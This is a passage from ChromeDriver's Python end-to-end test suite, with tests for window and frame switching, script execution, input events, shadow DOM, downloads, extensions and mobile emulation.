ChromeDriverTest._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverTest._http_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverTest._http_server.GetUrl() + file_path
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
def _WaitForNewWindow(self, old_handles):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = time.time() + 20
while time.time() < deadline:
new_handles = self._driver.GetWindowHandles()
if len(new_handles) > len(old_handles):
for index, old_handle in enumerate(old_handles):
self.assertEquals(old_handle, new_handles[index])
return new_handles[len(old_handles)]
time.sleep(0.01)
return None
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
self._driver.CloseWindow()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
self.assertNotEqual(None, self._WaitForNewWindow(old_handles))
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeout('script', 3000)
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testFindElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'), WebElement))
def testFindElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, WebElement))
def testFindChildElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'), WebElement))
def testFindChildElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, WebElement))
def testHoverOverElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchMovedElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchmove", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchMove(loc['x'] + 1, loc['y'] + 1)
self._driver.TouchUp(loc['x'] + 1, loc['y'] + 1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClearElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.Clear()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSendKeysToElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testGetCurrentUrl(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testDontGoBackOrGoForward(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
self._driver.GoBack()
self.assertEquals('data:,', self._driver.GetCurrentUrl())
self._driver.GoForward()
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testMouseMoveTo(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseButtonDownAndUp(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseDoubleClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript(
'window.setTimeout('
' function() { window.confirmed = confirm(\'HI\'); },'
' 0);')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tagName', 'a').Click()
new_window = self._WaitForNewWindow(old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tagName', 'body'))
def testWindowPosition(self):
position = self._driver.GetWindowPosition()
self._driver.SetWindowPosition(position[0], position[1])
self.assertEquals(position, self._driver.GetWindowPosition())
# Resize so the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(300, 300)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
def testWindowSize(self):
size = self._driver.GetWindowSize()
self._driver.SetWindowSize(size[0], size[1])
self.assertEquals(size, self._driver.GetWindowSize())
self._driver.SetWindowSize(600, 400)
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testWindowMaximize(self):
self._driver.SetWindowPosition(100, 200)
self._driver.SetWindowSize(600, 400)
self._driver.MaximizeWindow()
self.assertNotEqual([100, 200], self._driver.GetWindowPosition())
self.assertNotEqual([600, 400], self._driver.GetWindowSize())
# Set size first so that the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(600, 400)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEquals(len(logs), 2)
self.assertEquals(logs[0]['source'], 'network')
self.assertEquals(logs[1]['source'], 'javascript')
def testAutoReporting(self):
self.assertFalse(self._driver.IsAutoReporting())
self._driver.SetAutoReporting(True)
self.assertTrue(self._driver.IsAutoReporting())
url = self.GetHttpUrlForFile('/chromedriver/console_log.html')
self.assertRaisesRegexp(chromedriver.UnknownError,
'.*(404|Failed to load resource).*',
self._driver.Load,
url)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tagName', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testHasFocusOnStartup(self):
# Some pages (about:blank) cause Chrome to put the focus in URL bar.
# This breaks tests depending on focus.
self.assertTrue(self._driver.ExecuteScript('return document.hasFocus()'))
def testTabCrash(self):
# If a tab is crashed, the session will be deleted.
# When 31 is released, will reload the tab instead.
# https://code.google.com/p/chromedriver/issues/detail?id=547
self.assertRaises(chromedriver.UnknownError,
self._driver.Load, 'chrome://crash')
self.assertRaises(chromedriver.NoSuchSession,
self._driver.GetCurrentUrl)
def testDoesntHangOnDebugger(self):
self._driver.ExecuteScript('debugger;')
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testChromeDriverSendLargeData(self):
script = 's = ""; for (i = 0; i < 10e6; i++) s += "0"; return s;'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testShadowDomFindElementWithSlashDeep(self):
"""Checks that chromedriver can find elements in a shadow DOM using /deep/
css selectors."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
self.assertTrue(self._driver.FindElement("css", "* /deep/ #olderTextBox"))
def testShadowDomFindChildElement(self):
"""Checks that chromedriver can find child elements from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderChildDiv")
self.assertTrue(elem.FindElement("id", "olderTextBox"))
def testShadowDomFindElementFailsFromRootWithoutSlashDeep(self):
"""Checks that chromedriver can't find elements in a shadow DOM without
/deep/."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# can't find element from the root without /deep/
with self.assertRaises(chromedriver.NoSuchElement):
self._driver.FindElement("id", "#olderTextBox")
def testShadowDomFindElementFailsBetweenShadowRoots(self):
"""Checks that chromedriver can't find elements in other shadow DOM
trees."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #youngerChildDiv")
with self.assertRaises(chromedriver.NoSuchElement):
elem.FindElement("id", "#olderTextBox")
def testShadowDomText(self):
"""Checks that chromedriver can find extract the text from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderHeading")
self.assertEqual("Older Child", elem.GetText())
def testShadowDomSendKeys(self):
"""Checks that chromedriver can call SendKeys on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderTextBox")
elem.SendKeys("bar")
self.assertEqual("foobar", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomClear(self):
"""Checks that chromedriver can call Clear on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderTextBox")
elem.Clear()
self.assertEqual("", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomClick(self):
"""Checks that chromedriver can call Click on an element in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
elem.Click()
# the butotn's onClicked handler changes the text box's value
self.assertEqual("Button Was Clicked", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomStaleReference(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").innerHTML="<div/>";')
with self.assertRaises(chromedriver.StaleElementReference):
elem.Click()
def testShadowDomDisplayed(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
self.assertTrue(elem.IsDisplayed())
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").style.display="None";')
self.assertFalse(elem.IsDisplayed())
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = map(int, v['version'].split('.'))
device = map(int, self._driver.capabilities['version'].split('.'))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except urllib2.URLError as e:
print 'Unable to fetch current version info from omahaproxy (%s)' % e
def testDeviceManagement(self):
self._drivers = [self.CreateDriver() for x in
android_commands.GetAttachedDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
shutil.rmtree(temp_dir)
def testFileDownload(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('id', 'red-dot').Click()
deadline = time.time() + 60
while True:
time.sleep(0.1)
if os.path.isfile(download_name) or time.time() > deadline:
break
self.assertTrue(os.path.isfile(download_name), "Failed to download file!")
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testWaitsForExtensionToLoad(self):
did_load_event = threading.Event()
server = webserver.SyncWebServer()
def RunServer():
time.sleep(5)
server.RespondWithContent('<html>iframe</html>')
did_load_event.set()
thread = threading.Thread(target=RunServer)
thread.daemon = True
thread.start()
crx = os.path.join(_TEST_DATA_DIR, 'ext_slow_loader.crx')
driver = self.CreateDriver(
chrome_switches=['user-agent=' + server.GetUrl()],
chrome_extensions=[self._PackExtension(crx)])
self.assertTrue(did_load_event.is_set())
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTest):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
@staticmethod
def GlobalSetUp():
def respondWithUserAgentString(request):
return """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
MobileEmulationCapabilityTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
@staticmethod
def GlobalTearDown():
MobileEmulationCapabilityTest._http_server.Shutdown()
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.SetWindowSize(600, 400)
driver.Load(self._http_server.GetUrl() + '/userAgent')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testDeviceMetricsWithDeviceWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr'
'ome/18.0.1025.166 Mobile Safari/535.19'
})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertTrue(driver.capabilities['mobileEmulationEnabled'])
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
def testUserAgent(self):
driver = self.CreateDriver(
mobile_emulation = {'userAgent': 'Agent Smith'})
driver.Load(self._http_server.GetUrl() + '/userAgent')
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual("Agent Smith", body_tag.GetText())
def testDeviceName(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth')
self.assertEqual(360, driver.ExecuteScript('return window.screen.width'))
self.assertEqual(640, driver.ExecuteScript('return window.screen.height'))
body_tag = driver.FindElement('tag name', 'body')
self.assertEqual(
'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleW'
'ebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/53'
'5.19',
body_tag.GetText())
def testSendKeysToElement(self):
driver = self.CreateDriver(
mobile_emulation = {'deviceName': 'Google Nexus 5'})
text = driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testHoverOverElement(self):
driver = self.CreateDriver(
